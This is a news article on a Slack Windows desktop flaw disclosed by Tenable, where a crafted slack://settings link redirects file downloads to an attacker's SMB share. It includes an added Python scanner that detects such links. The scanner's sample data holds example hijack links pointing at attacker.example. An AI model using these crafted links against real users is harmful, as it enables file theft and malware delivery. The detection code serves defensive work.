On May 17, researchers at Tenable revealed that they had discovered a vulnerability in the Windows version of the desktop application for Slack, the widely used collaboration service. The vulnerability, in Slack Desktop version 3.3.7 for Windows, could have been used to change the destination of a file download from a Slack conversation to a remote file share owned by an attacker. This would have allowed the attacker not only to steal the files downloaded by a targeted user, but also to alter those files and add malware to them. When victims opened the files, they would get a potentially nasty surprise.
Tenable reported the vulnerability to Slack via HackerOne. Slack has issued an update to the Windows desktop client that closes the vulnerability.
The potential attack used a weakness in the way the "slack://" protocol handler was implemented in the Windows application. By crafting a link and posting it in a Slack channel, the attacker could modify the default settings of the client, changing the download directory, for example, to a new location with a URL such as "slack://settings/?update=". That path could be pointed at a Server Message Block (SMB) file share controlled by the attacker. Once the link was clicked, all future downloads would be dropped onto the attacker's SMB server. The link could be disguised as a Web link: in a proof-of-concept, the malicious Slack link posed as a link to Google.
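The settings-rewrite mechanism described above is easy to hunt for in chat exports, RSS feed bodies or proxy logs. The following is an added example written for this page; it is not Tenable's proof-of-concept and not Slack's code. It assumes (and this is an assumption, not something the page states) that the value of the `update` parameter is a JSON object mapping preference names to values; the preference name Slack used for the download directory is not given here, so the hypothetical key `downloadPath` in the sample data is a placeholder and the detector keys on the shape of the value (a UNC path or smb:// URL) rather than on any key name.

```python
"""Flag slack:// links that rewrite client settings, and escalate when the
new value points at a remote SMB share (the download-directory hijack).

Added example for this page, not Tenable's PoC or Slack's code.
Assumption: the `update` parameter carries a JSON object of preference
name -> value.  The real preference key is not given on the page, so we
look at the *value* shape, not the key.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# \\host\share, //host/share or smb://host/share anywhere in a string.
# Backslashes may be doubled when the payload is still JSON-escaped, hence
# the \\{2,}.  The lookbehinds keep ordinary http(s) URLs from matching.
REMOTE_SHARE_RE = re.compile(
    r"(?<!http:)(?<!https:)(?:\\{2,}|//)[\w.-]+(?:\\+|/)[\w.$-]+"
)
# A slack:// link runs until the first whitespace character.
SLACK_URL_RE = re.compile(r"slack://\S+", re.I)


def settings_update_payload(url):
    """Return the decoded `update` payload for a slack://settings/ URL.

    Returns None for anything that is not a settings update.  A payload
    that is not a JSON object comes back as {"_raw": <string>} so the
    caller can still inspect it (an empty `update=` lands here too).
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "slack" or parts.netloc.lower() != "settings":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "update" not in qs:
        return None
    raw = qs["update"][0]
    try:
        payload = json.loads(raw)
    except json.JSONDecodeError:
        return {"_raw": raw}
    return payload if isinstance(payload, dict) else {"_raw": raw}


def classify(url):
    """Return 'benign', 'settings-update' or 'download-path-hijack'."""
    payload = settings_update_payload(url)
    if payload is None:
        return "benign"
    for value in payload.values():
        if isinstance(value, str) and REMOTE_SHARE_RE.search(value):
            return "download-path-hijack"
    return "settings-update"


def scan_messages(messages):
    """Extract slack:// links from free text and return
    (message index, url, verdict) for every non-benign link."""
    hits = []
    for i, text in enumerate(messages):
        for url in SLACK_URL_RE.findall(text):
            verdict = classify(url)
            if verdict != "benign":
                hits.append((i, url, verdict))
    return hits


# Constructed sample input (not real traffic).  attacker.example and the
# `downloadPath` key are placeholders, not values taken from the advisory.
SAMPLE_MESSAGES = [
    "ordinary deep link: slack://channel?team=T123&id=C456",
    "harmless pref change: slack://settings/?update=%7B%22theme%22%3A%22dark%22%7D",
    r'hijack, JSON-escaped UNC: slack://settings/?update={"downloadPath":"\\\\attacker.example\\share"}',
    r'hijack, smb URL: slack://settings/?update={"downloadPath":"smb://attacker.example/share"}',
    r"hijack, non-JSON payload: slack://settings/?update={'downloadPath':'\\\\attacker.example\\share'}",
]

if __name__ == "__main__":
    for idx, url, verdict in scan_messages(SAMPLE_MESSAGES):
        print(f"message {idx}: {verdict}: {url}")
```

The scanner only sees links that appear literally as `slack://`; a Web link that merely redirects to one (the disguised-link case) has to be followed first, so in practice this check belongs after redirect resolution, or on the final URL handed to the protocol handler.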
In a blog post, Tenable's David Wells reviewed a number of ways in which this vulnerability could be used maliciously. Once the attacker had changed the default download location, "the attacker could have not only stolen the file, but even inserted malicious code in it so that when opened by victim after download (through the Slack application), their machine would have been infected," Wells wrote.
An attacker would not even have to be a member of a Slack channel to successfully inject the URL, Wells noted; the link could be fed into a channel via an RSS feed, for example, since Slack channels can be set up to subscribe to them. "I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells explained. That post could include a Web link "that would redirect to our malicious slack:// link and change settings when clicked." However, this attack would most likely throw up a dialog box warning that the Web link was trying to open Slack, so it would not work unless the victim clicked through and approved it.